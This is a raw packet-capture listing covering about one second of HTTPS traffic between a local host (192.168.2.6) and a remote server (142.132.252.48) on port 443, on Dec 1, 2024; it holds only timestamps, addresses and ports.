                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.793205976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.793230057 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.793246984 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.798778057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.798805952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.798882008 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.798882008 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.798891068 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.799470901 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.803791046 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.956415892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.956446886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.956765890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.956787109 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.956918955 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.967531919 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.967564106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.967869997 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.967889071 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.968790054 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.972382069 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.972405910 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.972584009 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.972593069 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.976789951 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.978123903 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.978152990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.978221893 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.978221893 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.978233099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.978485107 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.983735085 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.983753920 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.983803034 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.983813047 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.984772921 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.989420891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.989440918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.989492893 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.989502907 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.990711927 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.994431019 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.994452000 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.994502068 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.994508028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.994518995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:47.996690035 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.000068903 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.000101089 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.000149012 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.000155926 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.000185966 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.000185966 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.007297039 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.157463074 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.157495022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.157676935 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.157676935 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.157691002 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.159373045 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.168896914 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.168925047 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.168977022 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.168986082 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.169127941 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.169127941 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.173918962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.173948050 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.174015045 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.174015999 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.174031973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.175396919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.179431915 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.179455042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.179534912 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.179534912 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.179542065 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.179584980 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.185170889 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.185190916 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.185273886 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.185281992 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.188756943 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.190717936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.190738916 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.190886974 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.190893888 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.192660093 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.195734978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.195753098 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.195857048 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.195863962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.200623989 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.201323032 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.201340914 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.201395988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.201405048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.201416016 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.204617023 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.207962990 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.360763073 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.360806942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.360878944 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.360878944 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.360888958 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.360954046 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.370162010 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.370181084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.370212078 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.370225906 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.370270967 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.370270967 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.376281977 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.376302958 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.376358986 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.376368999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.376383066 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.376519918 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.381968021 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.381989002 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.382023096 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.382035017 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.382077932 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.382077932 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.386976004 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.386995077 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.387037992 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.387046099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.387088060 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.387088060 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.392635107 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.392651081 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.392714977 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.392714977 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.392720938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.392898083 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.398355007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.398374081 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.398408890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.398420095 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.398467064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.398467064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.403669119 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.403686047 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.403738976 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.403738976 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.403744936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.403835058 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.562671900 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.562690973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.562952042 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.562964916 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.563015938 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.571805000 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.571825027 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.571958065 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.571969986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.572007895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.577653885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.577672005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.577725887 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.577753067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.577810049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.583189011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.583208084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.583273888 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.583285093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.583334923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.588654995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.588674068 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.588743925 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.588743925 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.588756084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.588803053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.593914986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.593935013 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.593966961 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.593981028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.594012022 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.594012022 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.594111919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.599636078 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.599653006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.599746943 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.599746943 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.599759102 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.599821091 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.601975918 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.604559898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.604578972 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.604652882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.604660034 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.604703903 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.614641905 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.764091015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.764115095 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.764307976 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.764318943 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.764364004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.772777081 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.772794962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.772870064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.772886992 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.772931099 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.778955936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.778973103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.779047966 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.779057026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.779103994 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.784588099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.784605026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.784668922 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.784677029 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.784724951 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.784724951 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.789503098 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.789519072 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.789581060 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.789594889 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.789671898 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.795305014 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.795327902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.795361042 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.795372009 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.795417070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.795417070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.800894022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.800921917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.801201105 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.801213026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.801284075 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.802580118 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.806647062 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.806674004 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.806715012 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.806724072 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.806765079 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.806765079 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.809602022 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.965107918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.965138912 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.965173960 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.965197086 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.965229988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.965262890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.974073887 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.974091053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.974149942 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.974158049 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.974205017 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.980369091 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.980391026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.980485916 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.980494976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.980539083 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.985352993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.985380888 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.985438108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.985462904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.985492945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.985492945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.991118908 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.991142035 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.991241932 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.991241932 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.991249084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.992043972 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.996680021 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.996699095 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.997833967 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.997839928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:48.997925043 CET49721443192.168.2.6142.132.252.48
